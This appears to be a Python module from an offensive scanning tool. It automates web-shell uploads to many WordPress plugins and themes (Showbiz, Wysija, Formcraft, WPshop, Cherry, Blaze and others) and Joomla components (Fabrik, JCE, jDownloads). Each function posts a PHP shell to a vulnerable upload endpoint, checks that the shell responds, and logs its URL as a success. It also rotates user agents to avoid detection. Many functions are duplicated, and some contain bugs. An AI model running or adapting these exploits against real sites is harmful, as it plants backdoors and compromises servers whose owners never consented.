def wp_showbiz(url, headers, timeout, vulnresults):
endpoint = url + "/wp-admin/admin-ajax.php"
#method to randomize the user agent [functionINfunction]
def random_UserAgent():
useragents_rotate = [
"Mozilla/5.0 (Windows NT 5.1; rv:31.0) Gecko/20100101 Firefox/31.0",
"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20120101 Firefox/29.0",
"Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)",
"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36",
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36",
"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.63 Safari/537.31"
]
useragents_random = random.choice(useragents_rotate)
return useragents_random
useragent = random_UserAgent()
headers['User-Agent'] = useragent
headers['Content_Type'] = 'multipart/form-data'
options = {
"action": "showbiz_ajax_action",
"client_action": "update_plugin",
"update_file": [open('./shell/VulnX.php', 'rb')]
}
send_shell = vxpost(endpoint, options, headers, timeout)
dump_data = url + "/wp-content/plugins/showbiz/temp/update_extract/VulnX.php?Vuln=X"
res = vxget(dump_data, options)
check_showbiz = re.findall("Vuln X", res)
if check_showbiz:
print(' %s Showbiz Pro %s %s' %
(que, vulnexploit, dump_data))
vulnresults.add('[SUCCESS] Showbiz Pro -- Shell:' + dump_data)
else:
print(' %s Showbiz Pro %s' % (que, failexploit))
vulnresults.add('[FAILED] Showbiz Pro')
def joomla_foxcontact(url, headers, timeout):
headers[
'User-Agent'] = 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:0.9.3) Gecko/20010801'
# foxf = {'components/com_foxcontact/lib/file-uploader.php?cid={}&mid={}&qqfile=/../../_func.php',
# 'index.php?option=com_foxcontact&view=loader&type=uploader&owner=component&id={}?cid={}&mid={}&qqfile=/../../_func.php',
# 'index.php?option=com_foxcontact&view=loader&type=uploader&owner=module&id={}&cid={}&mid={}&owner=module&id={}&qqfile=/../../_func.php',
# 'components/com_foxcontact/lib/uploader.php?cid={}&mid={}&qqfile=/../../_func.php'}
endpoint = url + "/index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload"
headers = {"content-type": ["form-data"]}
fieldname = 'file'
shell = open('./shell/VulnX.txt', 'rb')
data = {
fieldname: shell,
}
content = vxpost(endpoint, data, headers, timeout)
path_shell = endpoint + "/images/XAttacker.txt"
response = vxget(path_shell, headers, timeout)
if re.findall(r'Tig', response):
print(' %s Fox Contact %s %s' %
(que, vulnexploit, path_shell))
else:
print(' %s fox Contact %s' % (que, failexploit))
def wp_wysija(url, headers, timeout, vulnresults):
theme = "my-theme"
endpoint = url + "/wp-admin/admin-post.php?page=wysija_campaigns&action=themes"
shell = open('./shell/VulnX.php', 'rb')
field = "wpshop_file"
headers[
'User-Agent'] = 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.63 Safari/537.31'
headers['Content_Type'] = 'form-data'
options = {
'theme': shell,
'overwriteexistingtheme': 'on',
'action': 'themeupload',
'submitter': 'Upload'
}
send_shell = vxpost(endpoint, options, headers, timeout)
dump_data = url + "/wp-content/uploads/wysija/themes/VulnX/VulnX.php?Vuln=X"
res = vxget(dump_data, headers, timeout)
check_wysija = re.findall("Vuln X", res)
if check_wysija:
print(' %s Wysija Newsletters %s %s' %
(que, vulnexploit, dump_data))
vulnresults.add('[SUCCESS] Wysija Newsletters -- Shell:' + dump_data)
else:
print(' %s Wysija Newsletters %s' % (que, failexploit))
vulnresults.add('[FAILED] Wysija Newsletters')
def wp_wysija(url, headers):
theme = "my-theme"
endpoint = url + "/wp-admin/admin-post.php?page=wysija_campaigns&action=themes"
shell = open('./shell/VulnX.php', 'rb')
field = "wpshop_file"
headers[
'User-Agent'] = 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.63 Safari/537.31'
headers['Content_Type'] = 'form-data'
options = {
'theme': shell,
'overwriteexistingtheme': 'on',
'action': 'themeupload',
'submitter': 'Upload'
}
send_shell = vxpost(endpoint, options, headers, 3)
dump_data = url + "/wp-content/uploads/wysija/themes/VulnX/VulnX.php?Vuln=X"
res = vxget(dump_data, headers, 3)
check_wysija = re.findall("Vuln X", res)
if check_wysija:
print('%s [%s+%s] Wysija Newsletters%s -------------- %s VULN%s' %
(W, G, W, W, G, W))
print('%s [*] Injected Successfully \n %s%s[*] Found ->%s%s%s' %
(G, W, B, W, dump_data, W))
else:
print('%s [%s-%s] Wysija Newsletters%s -------------- %s FAIL%s' %
(W, R, W, W, R, W))
def joomla_comjdownloads(url, headers, timeout):
headers[
'User-Agent'] = 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:0.9.3) Gecko/20010801'
endpoint = url + "index.php?option=com_jdownloads&Itemid=0&view=upload"
headers = {"content-type": ["form-data"]}
files = open('./shell/VulnX.zip', 'rb')
shell = open('./shell/VulnX.gif', 'rb')
data = {
'name': 'Tig',
'mail': '*****@*****.**',
'filetitle': 'Tig',
'catlist': '1',
'license': '0',
'language': '0',
'system': '0',
'file_upload': files,
'pic_upload': shell,
'description': '<p>zot</p>',
'senden': 'Send file',
'option': 'com_jdownloads',
'view': 'upload',
'send': '1',
'24c22896d6fe6977b731543b3e44c22f': '1'
}
content = vxpost(endpoint, data, headers, timeout)
path_shell = endpoint + "/images/jdownloads/screenshots/VulnX.gif?Vuln=X"
response = vxget(path_shell, headers, timeout)
if re.findall(r'Vuln X', response):
print(' %s Com Jdownloads %s %s' %
(que, vulnexploit, path_shell))
else:
print(' %s Com Jdownloads %s' % (que, failexploit))
def wp_dm(url, headers, timeout, vulnresults):
headers['Content_Type']: 'multipart/form-data'
options = {'upfile': open('./shell/VulnX.php', 'rb'), 'dm_upload': ''}
send_shell = vxpost(url, options, headers, timeout)
dump_data = url + "/wp-content/plugins/downloads-manager/upload/VulnX.php?Vuln=X"
content = vxget(dump_data, headers, timeout)
check_dm = re.findall("Vuln X", content)
if check_dm:
print(' %s Download Manager %s %s' %
(que, vulnexploit, dump_data))
vulnresults.add('[SUCCESS] Download Manager -- Shell:' + dump_data)
else:
print(' %s Download Manager %s' % (que, failexploit))
vulnresults.add('[FAILED] Download Manager')
def wp_dm(url, headers):
headers['Content_Type']: 'multipart/form-data'
options = {'upfile': open('./shell/VulnX.php', 'rb'), 'dm_upload': ''}
send_shell = vxpost(url, options, headers, 3)
dump_data = url + "/wp-content/plugins/downloads-manager/upload/VulnX.php?Vuln=X"
content = vxget(dump_data, headers, 3)
check_dm = re.findall("Vuln X", content)
if check_dm:
print('%s [%s+%s] Download Manager %s---- %s VULN%s' %
(W, G, W, W, G, W))
print('%s [*] Injected Successfully \n %s%s[*] Found ->%s %s %s' %
(G, W, B, W, dump_data, W))
else:
print('%s [%s-%s] Download Manager %s --- %s FAIL%s' %
(W, R, W, W, R, W))
def wp_cherry(url, headers, timeout, vulnresults):
headers['Content_Type']: 'multipart/form-data'
options = {'file': open('./shell/VulnX.php', 'rb')}
endpoint = url + "/wp-content/plugins/cherry-plugin/admin/import-export/upload.php"
response = vxpost(endpoint, options, headers, timeout)
dump_data = url + "/wp-content/plugins/cherry-plugin/admin/import-export/VulnX.php?Vuln=X"
content = vxget(dump_data, headers, timeout)
check_cherry = re.findall("Vuln X", content)
if check_cherry:
print(' %s CherryFramework %s %s' %
(que, vulnexploit, dump_data))
vulnresults.add('[SUCCESS] CherryFramework -- Shell:' + dump_data)
else:
print(' %s CherryFramework %s' % (que, failexploit))
vulnresults.add('[FAILED] CherryFramework')
def wp_adblockblocker(url,headers,timeout,vulnresults):
endpoint = url + "/wp-admin/admin-ajax.php?action=getcountryuser&cs=2"
shell = open('./shell/VulnX.php','rb')
headers['Content_Type'] = 'multipart/form-data'
options = {
'popimg':shell,
}
send_shell = vxpost(endpoint,options,headers,timeout)
dump_data = url + "/wp-content/uploads/"+year+"/"+month+"/VulnX.php?Vuln=X"
res=vxget(dump_data, headers,timeout)
if re.findall("Vuln X", res):
print (' %s adblockblocker %s %s' %(que,vulnexploit,dump_data))
vulnresults.add('[SUCCESS] adblockblocker -- Shell:' + dump_data)
else:
print (' %s adblockblocker %s' %(que , failexploit))
vulnresults.add('[FAILED] adblockblocker')
def wp_cherry(url, headers):
headers['Content_Type']: 'multipart/form-data'
options = {'file': open('./shell/VulnX.php', 'rb')}
endpoint = url + "/wp-content/plugins/cherry-plugin/admin/import-export/upload.php"
response = vxpost(endpoint, options, headers, 3)
dump_data = url + "/wp-content/plugins/cherry-plugin/admin/import-export/VulnX.php?Vuln=X"
content = vxget(dump_data, headers, 3)
check_cherry = re.findall("Vuln X", content)
if check_cherry:
print('%s [%s+%s] CherryFramework%s ------------- %s VULN%s' %
(W, G, W, W, G, W))
print('%s [*]Shell Uploaded Successfully \n %s link : %s%s ' %
(B, W, dump_data, W))
else:
print('%s [%s-%s] CherryFramework%s ------------- %s FAIL%s' %
(W, R, W, W, R, W))
def wp_fromcraft(url, headers, timeout, vulnresults):
shell = open('./shell/VulnX.php', 'rb')
fields = "files[]"
headers['Content_Type'] = 'multipart/form-data'
options = {fields: shell}
endpoint = url + "/wp-content/plugins/formcraft/file-upload/server/php/"
response = vxpost(endpoint, options, headers, timeout)
dump_data = url + "/wp-content/plugins/formcraft/file-upload/server/php/files/VulnX.php?Vuln=X"
check_fromcraft = re.findall("\"files", response)
if check_fromcraft:
print(' %s Formcraft %s %s' %
(que, vulnexploit, dump_data))
vulnresults.add('[SUCCESS] Formcraft -- Shell:' + dump_data)
else:
print(' %s Formcraft %s' % (que, failexploit))
vulnresults.add('[FAILED] Formcraft')
def wp_fromcraft(url, headers):
shell = open('./shell/VulnX.php', 'rb')
fields = "files[]"
headers['Content_Type'] = 'multipart/form-data'
options = {fields: shell}
endpoint = url + "/wp-content/plugins/formcraft/file-upload/server/php/"
response = vxpost(endpoint, options, headers, 3)
dump_data = url + "/wp-content/plugins/formcraft/file-upload/server/php/files/VulnX.php?Vuln=X"
check_fromcraft = re.findall("\"files", response)
if check_fromcraft:
print('%s [%s+%s] Formcraft %s ---------- %s VULN%s' %
(W, G, W, W, G, W))
print('%s [*] Injected Successfully \n %s%s[*] Found ->%s %s %s' %
(G, W, B, W, dump_data, W))
else:
print('%s [%s-%s] Formcraft %s ---------- %s FAIL%s' %
(W, R, W, W, R, W))
def wp_shop(url, headers, timeout, vulnresults):
endpoint = url + "/wp-content/plugins/wpshop/includes/ajax.php?elementCode=ajaxUpload"
shell = open('./shell/VulnX.php', 'rb')
field = "wpshop_file"
headers['Content_Type'] = 'multipart/form-data'
options = {field: shell}
send_shell = vxpost(endpoint, options, headers, timeout)
dump_data = url + "/wp-content/uploads/VulnX.php?Vuln=X"
res = vxget(dump_data, headers, timeout)
check_shop = re.findall("Vuln X", res)
if check_shop:
print(' %s WPshop eCommerce %s %s' %
(que, vulnexploit, dump_data))
vulnresults.add('[SUCCESS] WPshop eCommerce -- Shell:' + dump_data)
else:
print(' %s WPshop eCommerce %s' % (que, failexploit))
vulnresults.add('[FAILED] WPshop eCommerce')
def wp_inboundiomarketing(url,headers,timeout,vulnresults):
endpoint = url + "/wp-content/plugins/inboundio-marketing/admin/partials/csv_uploader.php"
shell = open('./shell/VulnX.php','rb')
headers['Content_Type'] = 'multipart/form-data'
options = {
'file':shell,
}
send_shell = vxpost(endpoint,options,headers,timeout)
dump_data = url + "/wp-content/plugins/inboundio-marketing/admin/partials/uploaded_csv/VulnX.php?Vuln=X"
res=vxget(dump_data, headers,timeout)
check_wysija = re.findall("Vuln X", res)
if check_wysija:
print (' %s InBoundio Marketing %s %s' %(que,vulnexploit,dump_data))
vulnresults.add('[SUCCESS] InBoundio Marketing -- Shell:' + dump_data)
else:
print (' %s InBoundio Marketing %s' %(que , failexploit))
vulnresults.add('[FAILED] InBoundio Marketing')
def wp_adsmanager(url, headers, timeout, vulnresults):
endpoint = url + "/wp-content/plugins/simple-ads-manager/sam-ajax-admin.php"
shell = open('./shell/VulnX.php', 'rb')
field = "wpshop_file"
headers['Content_Type'] = 'multipart/form-data'
options = {'uploadfile': shell, 'action': 'upload_ad_image', 'path': ''}
send_shell = vxpost(endpoint, options, headers, timeout)
dump_data = url + "/wp-content/plugins/simple-ads-manager/VulnX.php?Vuln=X/"
res = vxget(dump_data, headers, timeout)
check_adsmanager = re.findall("{\"status\":\"success\"}", res)
if check_adsmanager:
print(' %s Simple Ads Manager %s %s' %
(que, vulnexploit, dump_data))
vulnresults.add('[SUCCESS] Simple Ads Manager -- Shell:' + dump_data)
else:
print(' %s Simple Ads Manager %s' % (que, failexploit))
vulnresults.add('[FAILED] Simple Ads Manager')
def wp_adsmanager(url, headers):
endpoint = url + "/wp-content/plugins/simple-ads-manager/sam-ajax-admin.php"
shell = open('./shell/VulnX.php', 'rb')
field = "wpshop_file"
headers['Content_Type'] = 'multipart/form-data'
options = {'uploadfile': shell, 'action': 'upload_ad_image', 'path': ''}
send_shell = vxpost(endpoint, options, headers, 3)
dump_data = url + "/wp-content/plugins/simple-ads-manager/VulnX.php?Vuln=X/"
res = vxget(dump_data, headers, 3)
check_adsmanager = re.findall("{\"status\":\"success\"}", res)
if check_adsmanager:
print('%s [%s+%s] Simple Ads Manager%s -------- %s VULN%s' %
(W, G, W, W, G, W))
print('%s [*] Injected Successfully \n %s%s[*] Found ->%s%s%s' %
(G, W, B, W, dump_data, W))
else:
print('%s [%s-%s] Simple Ads Manager%s -------- %s FAIL%s' %
(W, R, W, W, R, W))
def wp_shop(url, headers):
endpoint = url + "/wp-content/plugins/wpshop/includes/ajax.php?elementCode=ajaxUpload"
shell = open('./shell/VulnX.php', 'rb')
field = "wpshop_file"
headers['Content_Type'] = 'multipart/form-data'
options = {field: shell}
send_shell = vxpost(endpoint, options, headers, 3)
dump_data = url + "/wp-content/uploads/VulnX.php?Vuln=X"
res = vxget(dump_data, headers, 3)
check_shop = re.findall("Vuln X", res)
if check_shop:
print('%s [%s+%s] WPshop eCommerce%s ------------- %s VULN%s' %
(W, G, W, W, G, W))
print('%s [*] Injected Successfully \n %s%s[*] Found ->%s%s%s' %
(G, W, B, W, dump_data, W))
else:
print('%s [%s-%s] WPshop eCommerce%s ------------- %s FAIL%s' %
(W, R, W, W, R, W))
def wp_adblockblocker(url, headers):
endpoint = url + "/wp-admin/admin-ajax.php?action=getcountryuser&cs=2"
shell = open('./shell/VulnX.php', 'rb')
headers['Content_Type'] = 'multipart/form-data'
options = {
'popimg': shell,
}
send_shell = vxpost(endpoint, options, headers, 3)
dump_data = url + "/wp-content/uploads/" + year + "/" + month + "/VulnX.php?Vuln=X"
res = vxget(dump_data, headers, 3)
if re.findall("Vuln X", res):
print('%s [%s+%s] adblockblocker%s ------- %s VULN%s' %
(W, G, W, W, G, W))
print('%s [*] Injected Successfully \n %s%s[*] Found ->%s%s%s' %
(G, W, B, W, dump_data, W))
else:
print('%s [%s-%s] adblockblocker%s ------- %s FAIL%s' %
(W, R, W, W, R, W))
def joomla_fabrik2_d(url, headers, timeout):
headers[
'User-Agent'] = 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:0.9.3) Gecko/20010801'
endpoint = url + "/index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload"
headers = {"content-type": ["form-data"]}
fieldname = 'file'
shell = open('./shell/VulnX.txt', 'rb')
data = {
fieldname: shell,
}
content = vxpost(endpoint, data, headers, timeout)
path_shell = endpoint + "/images/XAttacker.txt"
response = vxget(path_shell, headers, timeout)
if re.findall(r'Tig', response):
print(' %s Com Fabrik2 %s %s' %
(que, vulnexploit, path_shell))
else:
print(' %s Com Fabrik2 %s' % (que, failexploit))
def wp_levoslideshow(url,headers,timeout,vulnresults):
endpoint = url + "/wp-admin/admin.php?page=levoslideshow_manage"
shell = open('./shell/VulnX.php','rb')
headers['Content_Type'] = 'multipart/form-data'
options = {
'album_img':shell,
'task' : 'lvo_add_new_album',
'album_name': '',
'album_desk': '',
}
send_shell = vxpost(endpoint,options,headers,timeout)
check = re.findall("/uploads/levoslideshow/(.*?)/big/VulnX.php/", send_shell)
if check:
dump_data = url + "/wp-content/uploads/levoslideshow/"+check.group(1)+"/big/VulnX.php?Vuln=X"
print (' %s levoslideshow %s %s' %(que,vulnexploit,dump_data))
vulnresults.add('[SUCCESS] levoslideshow -- Shell:' + dump_data)
else:
print (' %s levoslideshow %s' %(que , failexploit))
vulnresults.add('[FAILED] levoslideshow')
def wp_powerzoomer(url,headers,timeout,vulnresults):
endpoint = url + "/wp-admin/admin.php?page=powerzoomer_manage"
headers['Content_Type'] = 'multipart/form-data'
options = {
'album_img':[open('./shell/VulnX.php','rb')],
'task':'pwz_add_new_album',
'album_name':'',
'album_desc':''
}
response = vxpost(endpoint,options,headers,timeout)
check_powerzoomer = re.findall("\/uploads\/powerzoomer\/(.*?)\/big\/VulnX.php", response)
if check_powerzoomer:
uploadfolder = check_powerzoomer.group(1)
dump_data = url + "/wp-content/uploads/powerzoomer/"+uploadfolder+"/big/VulnX.php?Vuln=X"
print (' %s Powerzoomer %s %s' %(que,vulnexploit,dump_data))
vulnresults.add('[SUCCESS] Powerzoomer -- Shell:' + dump_data)
else:
print (' %s Powerzoomer %s' %(que , failexploit))
vulnresults.add('[FAILED] Powerzoomer')
def joomla_comedia(url, headers, timeout):
headers[
'User-Agent'] = 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:0.9.3) Gecko/20010801'
endpoint = url + "/index.php?option=com_media&view=images&tmpl=component&fieldid=&e_name=jform_articletext&asset=com_content&author=&folder="
headers = {"content-type": ["form-data"]}
fieldname = 'Filedata[]'
shell = open('./shell/VulnX.txt', 'rb')
data = {
fieldname: shell,
}
content = vxpost(endpoint, data, headers, timeout)
path_shell = endpoint + "/images/XAttacker.txt"
response = vxget(path_shell, headers, timeout)
if re.findall(r'Tig', response):
print(' %s Com Media %s %s' %
(que, vulnexploit, path_shell))
else:
print(' %s Com Media %s' % (que, failexploit))
def wp_synoptic(url, headers, timeout, vulnresults):
endpoint = url + "/wp-content/themes/synoptic/lib/avatarupload/upload.php"
#shell directory
shell = open('./shell/VulnX.php', 'rb')
field = "qqfile"
headers['Content_Type'] = 'multipart/form-data'
options = {field: shell}
send_shell = vxpost(endpoint, options, headers, timeout)
dump_data = url + "/wp-content/uploads/markets/avatars/VulnX.php?Vuln=X"
res = vxget(dump_data, headers, timeout)
check_synoptic = re.findall("Vuln X", res)
if check_synoptic:
print(' %s Synoptic %s %s' %
(que, vulnexploit, dump_data))
vulnresults.add('[SUCCESS] Synoptic -- Shell:' + dump_data)
else:
print(' %s Synoptic %s' % (que, failexploit))
vulnresults.add('[FAILED] Synoptic')
def wp_catpro(url,headers,timeout,vulnresults):
headers['Content_Type']:'multipart/form-data'
options = {
'album_img':[open('./shell/VulnX.php','rb')],
'task':'cpr_add_new_album',
'album_name':'',
'album_desc':''
}
endpoint = url + "/wp-admin/admin.php?page=catpro_manage"
content = vxpost(endpoint,options,headers,timeout)
check_catpro = re.findall("\/uploads\/blaze\/(.*?)\/big\/VulnX.php", content)
if check_catpro:
uploadfolder = check_catpro.group(1)
dump_data = url + "/wp-content/uploads/catpro/"+uploadfolder+"/big/VulnX.php?Vuln=X"
print (' %s Catpro Plugin %s %s' %(que,vulnexploit,dump_data))
vulnresults.add('[SUCCESS] Catpro -- Shell:' + dump_data)
else:
print (' %s Catpro Plugin %s' %(que , failexploit))
vulnresults.add('[FAILED] Catpro')
def wp_inboundiomarketing(url, headers):
endpoint = url + "/wp-content/plugins/inboundio-marketing/admin/partials/csv_uploader.php"
shell = open('./shell/VulnX.php', 'rb')
headers['Content_Type'] = 'multipart/form-data'
options = {
'file': shell,
}
send_shell = vxpost(endpoint, options, headers, 3)
dump_data = url + "/wp-content/plugins/inboundio-marketing/admin/partials/uploaded_csv/VulnX.php?Vuln=X"
res = vxget(dump_data, headers, 3)
check_wysija = re.findall("Vuln X", res)
if check_wysija:
print('%s [%s+%s] InBoundio Marketing%s ------- %s VULN%s' %
(W, G, W, W, G, W))
print('%s [*] Injected Successfully \n %s%s[*] Found ->%s%s%s' %
(G, W, B, W, dump_data, W))
else:
print('%s [%s-%s] InBoundio Marketing%s ------- %s FAIL%s' %
(W, R, W, W, R, W))
def wp_synoptic(url, headers):
endpoint = url + "/wp-content/themes/synoptic/lib/avatarupload/upload.php"
#shell directory
shell = open('./shell/VulnX.php', 'rb')
field = "qqfile"
headers['Content_Type'] = 'multipart/form-data'
options = {field: shell}
send_shell = vxpost(endpoint, options, headers, 3)
dump_data = url + "/wp-content/uploads/markets/avatars/VulnX.php?Vuln=X"
res = vxget(dump_data, headers, 3)
check_synoptic = re.findall("Vuln X", res)
if check_synoptic:
print('%s [%s+%s] Synoptic%s ----------- %s VULN%s' %
(W, G, W, W, G, W))
print('%s [*] Injected Successfully \n %s%s[*] Found ->%s %s %s' %
(G, W, B, W, dump_data, W))
else:
print('%s [%s-%s] Synoptic%s ----------- %s FAIL%s' %
(W, R, W, W, R, W))
def joomla_comjce(url, headers, timeout):
ip = socket.gethostbyname(hostd(url))
headers[
'User-Agent'] = 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:0.9.3) Gecko/20010801'
endpoint = url + "/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&cid=20"
data = {
'upload-dir': './../../',
'upload-overwrite': 0,
'Filedata': [open('./shell/VulnX.gif', 'rb')],
'action': 'Upload'
}
content = vxpost(endpoint, data, headers, timeout)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((url, 80))
path_shell = url + "/VulnX.gif"
res = requests.get(path_shell, headers)
if re.findall(r'/image/gif/', res):
print(' %s Com Jce %s %s' %
(que, vulnexploit, path_shell))
else:
print(' %s Com Jce %s' % (que, failexploit))
def wp_blaze(url,headers,timeout,vulnresults):
headers['Content_Type']:'multipart/form-data'
#options to send
options = {
'album_img':[open('./shell/VulnX.php','rb')],
'task':'blaze_add_new_album',
'album_name':'',
'album_desc':''
}
endpoint = url + "/wp-admin/admin.php?page=blaze_manage"
#vxpost alias sendrequest method in common folder.
content = vxpost(endpoint,options,headers,timeout)
check_blaze = re.findall("\/uploads\/blaze\/(.*?)\/big\/VulnX.php", content)
if check_blaze:
uploadfolder = check_blaze.group(1)
dump_data = url + "/wp-content/uploads/blaze/"+uploadfolder+"/big/VulnX.php?Vuln=X"
print (' %s Blaze SlideShow %s %s' %(que,vulnexploit,dump_data))
vulnresults.add('[SUCCESS] SlideShow -- Shell:' + dump_data)
else:
print (' %s Blaze SlideShow %s' %(que , failexploit))
vulnresults.add('[FAILED] SlideShow')
def wp_catpro(url, headers):
headers['Content_Type']: 'multipart/form-data'
options = {
'album_img': [open('./shell/VulnX.php', 'rb')],
'task': 'cpr_add_new_album',
'album_name': '',
'album_desc': ''
}
endpoint = url + "/wp-admin/admin.php?page=catpro_manage"
content = vxpost(endpoint, options, headers, 3)
check_catpro = re.findall("\/uploads\/blaze\/(.*?)\/big\/VulnX.php",
content)
if check_catpro:
uploadfolder = check_catpro.group(1)
dump_data = url + "/wp-content/uploads/catpro/" + uploadfolder + "/big/VulnX.php?Vuln=X"
print('%s [%s+%s] Catpro Plugin%s ------------- %s VULN%s' %
(W, G, W, W, G, W))
print('%s [*] Injected Successfully \n %s%s[*] Found ->%s%s%s' %
(G, W, B, W, dump_data, W))
else:
print('%s [%s-%s] Catpro Plugin%s ------------- %s FAIL%s' %
(W, R, W, W, R, W))
def wp_powerzoomer(url, headers):
endpoint = url + "/wp-admin/admin.php?page=powerzoomer_manage"
headers['Content_Type'] = 'multipart/form-data'
options = {
'album_img': [open('./shell/VulnX.php', 'rb')],
'task': 'pwz_add_new_album',
'album_name': '',
'album_desc': ''
}
response = vxpost(endpoint, options, headers, 3)
check_powerzoomer = re.findall(
"\/uploads\/powerzoomer\/(.*?)\/big\/VulnX.php", response)
if check_powerzoomer:
uploadfolder = check_powerzoomer.group(1)
dump_data = url + "/wp-content/uploads/powerzoomer/" + uploadfolder + "/big/VulnX.php?Vuln=X"
print('%s [%s+%s] Powerzoomer %s ------- %s VULN%s' %
(W, G, W, W, G, W))
print('%s [*] Injected Successfully \n %s%s[*] Found ->%s %s %s' %
(G, W, B, W, dump_data, W))
else:
print('%s [%s-%s] Powerzoomer %s ------- %s FAIL%s' %
(W, R, W, W, R, W))
